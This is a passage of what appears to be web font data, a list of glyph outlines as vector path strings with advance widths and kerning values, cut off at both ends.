90","w":159},{"d":"79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88xm139,-261r-53,65r-23,0r33,-65r43,0","w":163},{"d":"144,-88v0,74,-68,111,-134,81r7,-46v28,19,77,13,77,-30v0,-38,-35,-51,-76,-47r18,-127r100,0r0,44r-64,0v0,15,-9,36,-5,47v47,-1,77,30,77,78"},{"w":79},{"d":"25,-181r49,0r0,181r-49,0r0,-181xm19,-229v0,-17,14,-31,31,-31v17,0,31,14,31,31v0,17,-14,31,-31,31v-17,0,-31,-14,-31,-31","w":98},{"d":"69,-330v17,0,44,19,47,-7r16,0v0,42,-30,49,-64,35v-8,0,-11,6,-13,14r-17,0v4,-23,10,-42,31,-42xm67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0","w":167},{"d":"105,-101v5,-33,-27,-48,-44,-27v-4,6,-6,15,-6,27r50,0xm78,-176v53,0,71,43,69,103r-92,1v-7,39,40,55,49,20r41,0v-6,32,-30,56,-67,55v-45,0,-70,-40,-70,-89v0,-51,24,-90,70,-90","w":154,"k":{"x":6,"-":-7}},{"d":"105,-101v5,-33,-27,-48,-44,-27v-4,6,-6,15,-6,27r50,0xm78,-176v53,0,71,43,69,103r-92,1v-7,39,40,55,49,20r41,0v-6,32,-30,56,-67,55v-45,0,-70,-40,-70,-89v0,-51,24,-90,70,-90xm49,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm107,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":154},{"d":"47,-214r0,-26r87,0r0,26r-87,0","w":180},{"d":"19,0r0,-172r47,0r0,172r-47,0xm-7,-261r43,0r33,65r-23,0","w":84},{"d":"3,0r50,-134r-46,0r0,-38r107,0r-48,131r45,0r0,41r-108,0","w":118},{"d":"8,-86v0,-53,33,-100,85,-87v-5,-14,-10,-25,-16,-37r-35,17r-11,-24r34,-15v-10,-18,-13,-26,-22,-39r46,0r12,22r28,-13r11,23r-27,12v22,43,38,80,39,136v1,54,-23,94,-72,94v-47,0,-72,-39,-72,-89xm54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48","w":159},{"d":"78,-274v67,-7,89,97,40,124v55,24,42,174,-42,150r0,-47v24,4,27,-17,27,-46v1,-20,-9,-37,-27,-33r0,-41v18,-1,20,-12,21,-33v0,-19,-2,-35,-17,-36v-25,-1,-16,43,-16,74r0,162r-46,0r0,-185v-2,-57,10,-84,60,-89","w":161,"k":{"-":-7}},{"d":"109,-133v0,-26,-12,-37,-39,-35r0,71v26,1,39,-11,39,-36xm157,-134v0,52,-32,79,-87,76r0,58r-50,0r0,-257r50,0r0,49v56,-1,87,21,87,74","w":163},{"d":"24,69r21,-69r-45,-172r47,0v6,36,18,68,20,108v5,-38,13,-73,21,-108r47,0r-65,241r-46,0","w":133,"k":{".":31,",":31}},{"d":"33,-196r29,-65r36,0r29,65r-21,0r-26,-38r-26,38r-21,0xm54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-90","w":159},{"d":"127,-19v-13,28,-68,34,-86,6r-17,89r-40,0r52,-266r40,0r-24,130v-4,40,48,44,66,19v22,-31,28,-102,39,-149r40,0r-29,153v-1,11,7,13,18,12r-6,27v-21,7,-57,6,-53,-21","w":212},{"d":"22,-172v-5,-62,1,-118,68,-102r0,41v-31,-9,-19,35,-21,61r21,0r0,36r-21,0r0,136r-47,0r0,-136r-18,0r0,-36r18,0","w":93,"k":{".":6,",":6}},{"d":"187,-57r27,0r1,-60v-7,25,-18,39,-28,60xm213,0r0,-36r-47,0r0,-21r43,-87r31,0r0,87r13,0r0,21r-13,0r0,36r-27,0xm40,3r150,-263r30,0r-151,263r-29,0xm37,-113r0,-120r-15,0r0,-24r46,0r0,144r-31,0","w":259},{"d":"80,-135v-36,2,-36,95,0,97v36,-1,39,-97,0,-97xm203,-101v5,-33,-28,-47,-45,-27v-5,5,-7,16,-7,28xm243,-52v-3,51,-81,74,-114,35v-46,47,-131,4,-121,-69v-9,-72,74,-118,120,-70v12,-13,27,-20,49,-20v53,0,71,43,69,102v-30,2,-69,-4,-95,2v-6,38,42,55,51,20r41,0","w":252,"k":{"x":6,"-":-7}},{"d":"39,-103r0,-128r-16,0r0,-26r49,0r0,154r-33,0","w":104},{"d":"-5,-196r30,-65r35,0r30,65r-22,0r-25,-38r-26,38r-22,0xm19,0r0,-172r47,0r0,172r-47,0","w":84},{"d":"131,-127v-1,-50,-13,-84,-60,-83r0,163v44,1,61,-33,60,-80xm182,-128v0,99,-52,138,-162,128r0,-257v106,-8,162,27,162,129","w":193,"k":{"\u00c5":6,"Y":6,"W":6,"V":6,"A":6,";":-7,":":-7,".":15,",":15}},{"d":"75,-275r31,0r0,360r-31,0r0,-360","w":180},{"d":"93,-131v-30,-19,-46,23,-39,60v1,4,1,8,2,12xm66,-43v31,21,47,-21,40,-59v-1,-5,-1,-9,-2,-13xm152,-86v4,62,-47,107,-105,82r-11,22r-14,-8r12,-24v-46,-42,-30,-167,46,-162v13,1,23,2,32,8r10,-21r14,8r-10,22v17,17,25,40,26,73","w":159,"k":{"x":6,"-":-7}},{"d":"79,3v-78,6,-92,-124,-29,-142r0,-3v-22,-6,-33,-25,-32,-54v0,-41,22,-60,61,-64v68,-7,84,102,29,118r0,3v27,7,40,32,40,67v0,46,-26,71,-69,75xm97,-192v0,-16,-4,-28,-18,-28v-14,0,-17,10,-17,26v0,18,3,30,17,30v15,0,17,-11,18,-28xm100,-78v0,-20,-3,-36,-21,-36v-17,0,-21,16,-21,35v0,22,3,37,21,37v17,0,21,-16,21,-36"},{"d":"105,-101v5,-33,-27,-48,-44,-27v-4,6,-6,15,-6,27r50,0xm78,-176v53,0,71,43,69,103r-92,1v-7,39,40,55,49,20r41,0v-6,32,-30,56,-67,55v-45,0,-70,-40,-70,-89v0,-51,24,-90,70,-90xm28,-261r43,0r33,65r-23,0","w":154},{"d":"21,-98r-21,15r0,-37r21,-15r0,-137r48,0r0,115r21,-15r0,37r-21,15r0,120r-48,0r0,-98","w":90},{"d":"25,-75r0,-182r49,0r0,182r-49,0xm50,-59v17,0,31,14,31,31v0,17,-14,31,-31,31v-17,0,-31,-14,-31,-31v0,-17,14,-31,31,-31","w":98},{"d":"45,0r-45,-172r46,0r22,128v4,-45,13,-87,21,-128r46,0r-44,172r-46,0","w":135,"k":{".":28,",":28}},{"d":"-5,49r29,-106r51,0r-44,106r-36,0xm50,-163v18,0,31,13,31,30v0,18,-13,32,-31,32v-18,0,-31,-14,-31,-32v0,-17,13,-30,31,-30","w":98},{"d":"59,0r0,-214r-24,0r0,-43r73,0r0,257r-49,0"},{"d":"-3,0r83,-210r-71,0r0,-47r140,0r-82,207r75,0r0,50r-145,0","w":154,"k":{";":-7,":":-7,".":-7,"-":6,",":-7}},{"d":"77,-198v-2,-56,24,-63,77,-62r0,32v-81,-21,-4,130,-77,135v42,4,36,51,36,97v0,32,9,39,41,38r0,31v-52,1,-77,-6,-77,-61v0,-48,7,-98,-49,-90r0,-31v54,8,51,-40,49,-89","w":180},{"d":"212,-145v73,5,22,91,-2,120r37,0r0,25r-80,0v17,-37,45,-66,55,-110v0,-9,-4,-14,-12,-14v-14,0,-13,10,-14,29r-27,0v-1,-32,12,-52,43,-50xm40,3r150,-263r30,0r-151,263r-29,0xm37,-113r0,-120r-15,0r0,-24r46,0r0,144r-31,0","w":259},{"d":"22,-345r21,0r26,38r26,-38r21,0r-29,65r-35,0xm130,-72v6,63,-68,94,-118,63r0,-53v16,19,66,28,66,-9v-11,-42,-70,-58,-70,-115v0,-61,64,-94,111,-61r0,45v-21,-14,-59,-18,-59,14v0,49,78,56,70,116","w":138},{"d":"63,-345r22,0r26,38r25,-38r22,0r-30,65r-35,0xm67,-129v0,53,35,97,85,75r0,51v-79,26,-140,-42,-140,-123v0,-84,57,-155,140,-128r0,48v-51,-22,-85,22,-85,77","w":163},{"d":"13,-58r0,-56r91,0r0,56r-91,0","w":117},{"d":"20,0r0,-257r108,0r0,48r-58,0r0,52r53,0r0,47r-53,0r0,60r58,0r0,50r-108,0","w":142,"k":{";":-7,":":-7,".":-7,",":-7}},{"d":"22,0r0,-100r-22,16r0,-49r22,-16r0,-108r51,0r0,81r37,-26r0,49r-37,26r0,77r59,0r0,50r-110,0","w":131,"k":{"y":13,"Y":8,"W":6,"V":13,"T":13,";":-7,":":-7,".":-7,",":-7}},{"d":"112,-53v5,54,-73,73,-107,38r19,-35v11,9,37,22,40,-1v-8,-26,-55,-32,-55,-72v0,-53,67,-66,103,-38r-20,34v-10,-9,-33,-18,-37,0v11,25,62,34,57,74xm98,49v2,42,-50,40,-80,28r0,-23v13,4,24,8,37,8v9,0,15,-3,15,-13v0,-12,-13,-12,-26,-12r0,-37r17,0v1,5,-3,15,2,16v23,-1,34,11,35,33","w":120},{"d":"75,-72r31,0r0,134r-31,0r0,-134xm75,-252r31,0r0,134r-31,0r0,-134","w":180},{"d":"85,-330v17,0,44,19,47,-7r16,0v0,43,-31,49,-65,35v-8,0,-11,6,-13,14r-16,0v4,-23,10,-42,31,-42xm64,-186r3,186r-47,0r0,-257r52,0r68,191v-11,-60,-8,-123,-8,-191r47,0r0,257r-47,0","w":199},{"d":"19,0r0,-172r47,0r0,172r-47,0","w":84},{"d":"130,-72v6,63,-68,94,-118,63r0,-53v16,19,66,28,66,-9v-11,-42,-70,-58,-70,-115v0,-61,64,-94,111,-61r0,45v-21,-14,-59,-18,-59,14v0,49,78,56,70,116xm107,49v2,42,-50,40,-80,28r0,-23v13,4,24,8,37,8v9,0,15,-3,15,-13v0,-12,-13,-12,-26,-12r0,-37r17,0v1,5,-3,15,2,16v23,-1,34,11,35,33","w":138},{"d":"54,-258v77,5,22,97,-1,129r38,0r0,26r-84,0v18,-40,47,-70,58,-117v0,-9,-4,-15,-12,-15v-16,1,-14,12,-16,31r-27,0v-2,-34,12,-56,44,-54","w":104},{"d":"12,-261r22,0r25,38r26,-38r22,0r-30,65r-35,0xm3,0r50,-134r-46,0r0,-38r107,0r-48,131r45,0r0,41r-108,0","w":118},{"d":"28,-261r21,0r26,38r26,-38r21,0r-30,65r-35,0xm9,-86v0,-62,42,-108,99,-83r0,46v-22,-21,-56,1,-51,35v-5,35,29,58,51,36r0,45v-50,31,-99,-16,-99,-79","w":114},{"d":"85,-325v-26,1,-21,35,0,35v9,0,19,-7,18,-17v1,-9,-8,-18,-18,-18xm85,-269v-21,0,-39,-18,-39,-38v0,-21,18,-40,39,-40v21,0,39,19,39,40v0,21,-18,38,-39,38xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0xm67,-85r34,0r-17,-118","w":167,"k":{"y":6,"Y":6,"W":6,"V":6,"T":10,";":-7,":":-7,".":-11,",":-11}},{"d":"187,-57r27,0r1,-60v-7,25,-18,39,-28,60xm213,0r0,-36r-47,0r0,-21r43,-87r31,0r0,87r13,0r0,21r-13,0r0,36r-27,0xm40,3r150,-263r30,0r-151,263r-29,0xm46,-111v-27,0,-42,-15,-41,-43v8,1,21,-2,27,1v1,10,4,17,13,18v17,2,17,-29,10,-38v-4,-4,-13,-6,-20,-4v1,-7,-3,-20,2,-24v27,6,34,-32,12,-34v-9,-1,-12,7,-12,18r-26,0v-1,-28,13,-42,40,-41v41,-7,53,63,14,68r0,2v18,3,29,15,29,34v0,27,-19,43,-48,43","w":259},{"d":"104,-211v-47,0,-40,110,-28,146v5,14,15,19,28,19v31,0,37,-38,37,-78v0,-47,-2,-87,-37,-87xm102,-260v20,0,34,10,41,25r0,-22r106,0r0,50r-60,0r0,52r52,0r0,47r-52,0r0,58r60,0r0,50r-108,0r0,-22v-10,15,-24,24,-47,24v-56,-2,-80,-64,-80,-130v0,-73,23,-130,88,-132","w":259,"k":{";":-7,":":-7,".":-7,",":-7}},{"d":"26,-280r30,-65r35,0r30,65r-22,0r-26,-38r-25,38r-22,0xm20,0r0,-257r108,0r0,48r-58,0r0,52r53,0r0,47r-53,0r0,60r58,0r0,50r-108,0","w":142},{"d":"125,-150r-16,45r45,0r16,-45r-45,0xm129,-257r34,0r-27,77r44,0r27,-77r33,0r-27,77r52,0r-11,30r-51,0r-16,45r54,0r-11,30r-54,0r-27,76r-34,0r28,-76r-44,0r-28,76r-34,0r28,-76r-53,0r11,-30r52,0r16,-45r-55,0r10,-30r56,0","w":276},{"d":"67,-129v0,53,35,97,85,75r0,51v-79,26,-140,-42,-140,-123v0,-84,57,-155,140,-128r0,48v-51,-22,-85,22,-85,77xm161,-345r-53,65r-23,0r33,-65r43,0","w":163},{"d":"45,-274v51,95,52,256,0,352r-39,-11v47,-89,48,-241,0,-330","w":99},{"d":"20,0r0,-257r108,0r0,48r-58,0r0,52r53,0r0,47r-53,0r0,60r58,0r0,50r-108,0xm44,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm102,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":142},{"d":"41,-45v3,-18,5,-37,-2,-52r-31,0r0,-24r23,0v-35,-51,-23,-139,55,-139v43,0,68,23,66,67r-40,12v1,-21,-7,-35,-27,-35v-46,0,-20,65,-10,95r47,0r0,24r-42,0v4,21,2,41,-6,56v23,14,55,5,68,-14r20,34v-23,31,-80,24,-117,13v-11,1,-20,5,-29,11r-17,-30v11,-12,21,-19,42,-18"},{"d":"63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132xm152,-345r-53,65r-23,0r33,-65r43,0","w":203},{"d":"45,0r0,-121r-60,-136r54,0r33,97v9,-34,20,-67,33,-97r50,0r-60,136r0,121r-50,0xm41,-291v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm99,-291v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":140},{"d":"128,49v2,42,-50,40,-80,28r0,-23v13,4,24,8,37,8v9,0,15,-3,15,-13v0,-12,-13,-12,-26,-12r0,-37r17,0v1,5,-3,15,2,16v23,-1,34,11,35,33","w":180},{"d":"31,-196r29,-65r36,0r29,65r-21,0r-26,-38r-26,38r-21,0xm105,-101v5,-33,-27,-48,-44,-27v-4,6,-6,15,-6,27r50,0xm78,-176v53,0,71,43,69,103r-92,1v-7,39,40,55,49,20r41,0v-6,32,-30,56,-67,55v-45,0,-70,-40,-70,-89v0,-51,24,-90,70,-90","w":154},{"d":"95,-78v7,66,-39,93,-94,76r0,-47v35,16,42,-4,42,-52r0,-156r52,0r0,179","w":113,"k":{";":11,":":11,".":18,",":18}},{"d":"67,-85r34,0r-17,-118xm-1,0r59,-257r54,0r57,257r-51,0r-9,-45r-51,0r-8,45r-51,0xm35,-345r43,0r33,65r-23,0","w":167},{"d":"70,-24r35,-64r-35,-60r27,-15r44,75r-44,79xm6,-24r34,-64r-34,-60r26,-15r44,75r-44,79","w":146,"k":{"Y":26,"X":6,"W":13,"V":20,"T":20,"J":-13}},{"d":"99,-42v29,0,29,-14,29,-49r0,-166r51,0r0,162v3,70,-18,98,-80,98v-65,0,-80,-33,-80,-106r0,-154r51,0r0,166v1,35,0,49,29,49xm49,-345r43,0r33,65r-23,0","w":197},{"d":"112,-128v-12,54,65,77,72,26r29,0v-1,32,-29,52,-63,52v-43,0,-70,-32,-70,-77v0,-64,64,-102,114,-67v12,8,17,21,18,35r-29,0v-2,-17,-16,-27,-34,-27v-27,1,-37,27,-37,58xm261,-128v0,-67,-44,-111,-111,-111v-68,0,-111,46,-111,111v0,65,45,110,111,110v66,0,111,-44,111,-110xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"55,-280r29,-65r36,0r29,65r-21,0r-26,-38r-26,38r-21,0xm63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132","w":203},{"d":"99,-42v29,0,29,-14,29,-49r0,-166r51,0r0,162v3,70,-18,98,-80,98v-65,0,-80,-33,-80,-106r0,-154r51,0r0,166v1,35,0,49,29,49xm149,-345r-53,65r-23,0r33,-65r43,0","w":197},{"d":"52,-280r29,-65r36,0r29,65r-21,0r-26,-38r-26,38r-21,0xm99,-42v29,0,29,-14,29,-49r0,-166r51,0r0,162v3,70,-18,98,-80,98v-65,0,-80,-33,-80,-106r0,-154r51,0r0,166v1,35,0,49,29,49","w":197},{"d":"71,-209r81,81r81,-81r20,21r-81,81r81,80r-20,21r-81,-81r-81,81r-21,-21r81,-80r-81,-81","w":299},{"d":"99,-42v29,0,29,-14,29,-49r0,-166r51,0r0,162v3,70,-18,98,-80,98v-65,0,-80,-33,-80,-106r0,-154r51,0r0,166v1,35,0,49,29,49","w":197,"k":{";":11,":":11,".":21,",":21}},{"d":"79,-40v21,0,20,-23,21,-49v1,-25,-2,-46,-22,-46v-30,0,-28,95,1,95xm62,-174v21,0,28,12,38,28r0,-26r45,0r0,172r-45,0r0,-25v-8,15,-19,28,-38,28v-39,0,-51,-41,-51,-89v0,-47,12,-88,51,-88xm60,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm118,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":163},{"d":"54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-90","w":159,"k":{"x":6,"-":-7}},{"d":"12,70r0,-335r81,0r0,36r-33,0r0,262r33,0r0,37r-81,0","w":99},{"d":"46,-207r207,86r0,28r-207,85r0,-32r165,-67r-165,-67r0,-33","w":299},{"d":"67,-129v0,53,35,97,85,75r0,51v-79,26,-140,-42,-140,-123v0,-84,57,-155,140,-128r0,48v-51,-22,-85,22,-85,77","w":163,"k":{";":-7,":":-7}},{"d":"20,0r0,-257r111,0r0,48r-61,0r0,53r56,0r0,47r-56,0r0,109r-50,0","w":140,"k":{"\u00ab":6,"\u00e6":6,"\u00c5":6,"u":6,"r":10,"a":6,"A":6,";":15,":":15,".":58,",":58}},{"d":"40,-60v17,0,30,13,30,31v0,18,-13,31,-30,31v-17,0,-31,-14,-31,-31v0,-17,14,-31,31,-31","w":79},{"d":"50,-163v18,0,31,13,31,30v0,18,-13,32,-31,32v-18,0,-31,-14,-31,-32v0,-17,13,-30,31,-30xm50,-60v17,0,31,14,31,31v0,17,-14,31,-31,31v-17,0,-31,-14,-31,-31v0,-17,14,-31,31,-31","w":98},{"d":"81,-122v-27,0,-28,79,-1,80v28,-1,27,-78,1,-80xm80,4v-49,0,-70,-37,-71,-90v-1,-43,41,-126,63,-171r49,0r-55,105v40,-33,87,5,84,61v-3,53,-21,95,-70,95"},{"d":"243,-20v-23,1,-37,-8,-37,-30v-11,18,-26,30,-53,30v-37,0,-54,-22,-55,-59v-1,-50,35,-99,83,-98v23,0,34,9,43,25r10,-19r27,0r-27,112v0,8,7,15,16,14v42,-6,63,-44,64,-89v2,-62,-54,-102,-119,-100v-92,2,-143,56,-149,143v-8,121,164,150,243,87r12,17v-31,23,-69,40,-119,40v-97,0,-165,-50,-165,-145v0,-105,72,-167,179,-167v85,0,147,42,147,125v0,63,-36,110,-100,114xm130,-78v0,36,39,46,60,24v22,-23,46,-99,-6,-101v-33,-1,-54,41,-54,77","w":360},{"d":"31,-153r-11,-20r39,-21r-39,-21r11,-20r38,23r-1,-45r23,0r-2,45r38,-23r12,20r-40,21r40,21r-12,20r-38,-25r2,46r-23,0r1,-46"},{"d":"20,0r0,-257r50,0r0,112r50,-112r53,0r-53,117r55,140r-55,0r-50,-125r0,125r-50,0","w":171,"k":{"\u0152":6,"\u00ab":10,"\u00d8":6,"\u00c5":6,"y":6,"O":6,"C":6,"A":6,";":-7,":":-7,".":-7,",":-7}},{},{"d":"1,-280r30,-65r35,0r30,65r-22,0r-25,-38r-26,38r-22,0xm22,0r0,-257r53,0r0,257r-53,0","w":97},{"d":"30,-345r21,0r26,38r26,-38r21,0r-29,65r-36,0xm-3,0r83,-210r-71,0r0,-47r140,0r-82,207r75,0r0,50r-145,0","w":154},{"d":"20,0r0,-257r51,0r0,95r57,0r0,-95r51,0r0,257r-51,0r0,-112r-57,0r0,112r-51,0","w":199,"k":{".":6,",":6}},{"d":"85,-191v-1,33,-12,73,-17,104r31,0v-4,-35,-13,-65,-14,-104xm-2,0r63,-257r101,0r8,47r-47,0r10,53r47,0r9,47r-47,0r11,60r47,0r9,50r-97,0r-7,-44r-45,0r-10,44r-52,0","w":203,"k":{";":-7,":":-7,".":-7,"-":-7,",":-7}},{"d":"45,0r0,-121r-60,-136r54,0r33,97v9,-34,20,-67,33,-97r50,0r-60,136r0,121r-50,0xm120,-345r-53,65r-23,0r33,-65r43,0","w":140},{"d":"66,0r-73,-257r52,0v14,65,36,122,43,194v5,-73,26,-130,40,-194r54,0r-73,257r-43,0","w":174,"k":{"\u0153":20,"\u00bb":13,"\u00ab":20,"\u00f8":20,"\u00e6":20,"\u00c5":6,"u":13,"o":20,"e":20,"a":20,"A":6,";":18,":":18,".":53,"-":16,",":53}},{"d":"62,-174v20,1,28,11,37,26r0,-53r-37,0r0,-32r37,0r0,-39r46,0r0,39r22,0r0,32r-22,0r0,201r-46,0r0,-25v-7,17,-19,29,-39,29v-68,0,-68,-178,2,-178xm79,-39v29,-3,30,-96,-1,-97v-30,3,-27,95,1,97","w":164},{"d":"182,-160v0,-25,-28,-24,-54,-24r0,46v26,0,54,2,54,-22xm215,-164v0,22,-14,36,-33,40r33,66r-35,0r-29,-61r-23,0r0,61r-31,0r0,-146v51,1,117,-9,118,40xm261,-127v0,-67,-44,-112,-111,-112v-67,0,-111,46,-111,111v0,65,44,110,109,110v67,0,113,-42,113,-109xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"126,-40v0,-13,12,-25,24,-25v13,0,24,12,24,25v0,13,-11,23,-24,23v-13,0,-24,-10,-24,-23xm45,-122r210,0r0,29r-210,0r0,-29xm126,-174v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24v-13,0,-24,-11,-24,-24","w":299},{"d":"16,0r81,-214r-77,0r0,-43r140,0r-93,257r-51,0"},{"d":"63,-128v0,45,4,82,39,82v33,0,39,-39,39,-82v0,-44,-6,-79,-39,-83v-34,3,-39,38,-39,83xm102,-260v64,0,90,62,90,135v0,68,-28,128,-90,128v-63,0,-90,-58,-90,-131v0,-72,26,-132,90,-132xm52,-345r43,0r33,65r-23,0","w":203},{"d":"79,33r-79,-293r31,0r79,293r-31,0","w":110},{"d":"84,-39v30,-2,30,-94,1,-97v-33,0,-30,96,-1,97xm102,4v-18,0,-32,-14,-38,-29r0,25r-46,0r0,-272r46,0r0,124v9,-15,17,-26,37,-26v41,0,51,43,51,92v0,46,-13,86,-50,86","w":163,"k":{"-":-7}},{"d":"0,49r28,-106r51,0r-43,106r-36,0","w":79},{"d":"20,0r0,-257r51,0r0,207r58,0r0,50r-109,0","w":129,"k":{"y":13,"Y":8,"W":6,"V":13,"T":13,";":-7,":":-7,".":-7,",":-7}},{"d":"9,-86v0,-62,42,-108,99,-83r0,46v-22,-21,-56,1,-51,35v-5,35,29,58,51,36r0,45v-50,31,-99,-16,-99,-79","w":114},{"d":"54,-87v0,27,6,49,26,49v37,0,37,-97,0,-97v-20,0,-26,22,-26,48xm80,-176v46,1,72,40,72,90v0,50,-25,89,-72,89v-47,-1,-72,-39,-72,-89v0,-50,25,-90,72,-90xm130,-261r-53,65r-23,0r33,-65r43,0","w":159},{"d":"112,-53v5,54,-73,73,-107,38r19,-35v11,9,37,22,40,-1v-8,-26,-55,-32,-55,-72v0,-53,67,-66,103,-38r-20,34v-10,-9,-33,-18,-37,0v11,25,62,34,57,74","w":120,"k":{"-":-7}},{"d":"20,0r0,-257r108,0r0,48r-58,0r0,52r53,0r0,47r-53,0r0,60r58,0r0,50r-108,0xm123,-345r-53,65r-23,0r33,-65r43,0","w":142},{"d":"64,-246v18,2,43,19,48,-6r16,0v-1,41,-31,49,-65,34v-8,0,-11,6,-13,14r-16,0v4,-22,10,-40,30,-42xm109,-174v33,0,36,18,36,56r0,118r-48,0r0,-104v-1,-17,0,-26,-15,-26v-15,1,-17,11,-17,28r0,102r-48,0r0,-172r44,0r0,26v10,-17,24,-28,48,-28","w":160},{"d":"113,-182v0,-26,-16,-34,-43,-33r0,65v27,1,43,-7,43,-32xm114,-78v0,-28,-14,-36,-44,-35r0,67v26,3,44,-5,44,-32xm166,-73v0,73,-65,77,-146,73r0,-257v74,0,146,-5,142,69v-1,29,-11,46,-32,56v24,8,36,27,36,59","w":175,"k":{"-":-10}},{"d":"69,-252r29,0r0,97r-29,0r0,-97xm15,-252r29,0r0,97r-29,0r0,-97","w":113},{"d":"19,0r0,-172r47,0r0,172r-47,0xm14,-207v-12,0,-21,-9,-21,-21v0,-25,42,-27,42,0v0,12,-9,21,-21,21xm72,-207v-12,0,-21,-9,-21,-21v0,-12,10,-21,21,-21v11,0,21,9,21,21v0,12,-9,21,-21,21","w":84},{"d":"94,-263v-48,87,-48,243,0,330r-40,11v-52,-96,-52,-256,0,-352","w":99},{"d":"74,4v-44,0,-70,-32,-65,-77r43,0v0,19,4,33,20,33v16,0,22,-16,22,-37v0,-29,-12,-41,-38,-37r0,-43v28,1,42,-6,42,-32v0,-16,-6,-28,-20,-28v-16,0,-20,14,-20,32r-41,0v-2,-47,19,-75,64,-75v68,0,82,116,21,123r0,3v29,6,46,25,46,61v0,46,-28,77,-74,77"},{"d":"-2,0r44,-92r-41,-80r45,0v7,15,18,29,21,48v2,-19,13,-32,20,-48r47,0r-44,79r45,93r-47,0v-8,-21,-18,-37,-21,-63v-5,24,-15,43,-23,63r-46,0","w":133,"k":{"\u0153":6,"\u00f8":6,"o":6,"e":6,"c":6,"-":11}},{"d":"61,-146v12,-31,74,-41,80,0v12,-16,22,-28,45,-28v34,0,34,23,34,66r0,108r-47,0r0,-104v0,-16,0,-26,-14,-26v-15,1,-17,11,-17,28r0,102r-47,0r0,-104v0,-15,-1,-27,-14,-27v-14,0,-17,11,-17,29r0,102r-47,0r0,-172r44,0r0,26","w":236},{"d":"22,0r0,-257r53,0r0,257r-53,0","w":97},{"d":"22,0r0,-257r53,0r0,257r-53,0xm99,-345r-53,65r-23,0r33,-65r43,0","w":97},{"d":"64,-186r3,186r-47,0r0,-257r52,0r68,191v-11,-60,-8,-123,-8,-191r47,0r0,257r-47,0","w":199,"k":{";":10,":":10,".":10,",":10}},{"d":"100,-286v-33,0,-47,-20,-47,-53r18,0v1,18,10,26,29,26v19,0,28,-8,29,-26r18,0v1,35,-14,53,-47,53xm63,-128v-4,56,28,108,66,69v6,-10,10,-24,10,-41r-46,0r0,-45r95,0v6,77,-21,148,-88,148v-62,0,-88,-59,-88,-131v0,-94,67,-167,140,-115v14,10,24,28,30,49r-46,21v-3,-22,-13,-36,-34,-38v-36,4,-36,37,-39,83","w":200},{"d":"15,-252r29,0r0,97r-29,0r0,-97","w":58},{"d":"98,-147v3,42,-53,60,-81,36v-9,-8,-14,-22,-11,-36v9,1,23,-3,28,2v0,11,3,18,13,18v11,1,15,-10,15,-22v0,-17,-7,-23,-25,-22v1,-8,-3,-22,2,-26v28,7,34,-33,13,-36v-11,-2,-14,8,-14,20r-27,0v-1,-29,13,-46,42,-45v43,-8,55,69,14,73r0,2v19,4,29,15,31,36","w":104},{"d":"82,-260v56,0,74,55,54,107v-9,24,-39,78,-56,109r58,0r0,44r-127,0r63,-123v12,-22,24,-47,24,-73v0,-14,-5,-24,-18,-25v-24,3,-21,19,-23,52r-42,0v-2,-54,16,-91,67,-91"},{"d":"171,-137v-18,0,-27,16,-26,37r52,-1v0,-23,-6,-36,-26,-36xm50,-51v0,14,8,21,24,21v16,0,24,-7,24,-21v0,-15,-9,-20,-24,-20v-15,0,-24,5,-24,20xm95,-94v13,-48,-48,-51,-74,-32r0,-41v34,-12,83,-14,99,15v12,-15,26,-24,51,-24v53,1,70,43,68,102v-30,2,-68,-4,-94,2v-7,39,42,55,51,20r41,0v-3,55,-90,74,-120,30v-25,42,-111,29,-111,-30v0,-46,52,-63,89,-42","w":246,"k":{"x":6,"-":-7}},{"d":"43,-102r43,0r2,-107v-12,41,-29,71,-45,107xm84,0r0,-64r-74,0r0,-38r68,-155r49,0r0,155r21,0r0,38r-21,0r0,64r-43,0"},{"d":"43,-192v-16,1,-28,-11,-28,-26v0,-16,12,-28,28,-28v16,0,27,12,27,28v0,15,-11,26,-27,26xm19,69r0,-241r47,0r0,241r-47,0","w":84},{"d":"65,-102r35,-70r53,0r-43,71r47,101r-53,0r-39,